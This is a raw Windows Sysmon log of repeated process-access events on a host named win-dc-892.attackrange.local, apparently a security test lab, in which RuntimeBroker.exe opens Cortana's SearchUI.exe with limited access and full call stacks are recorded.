12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
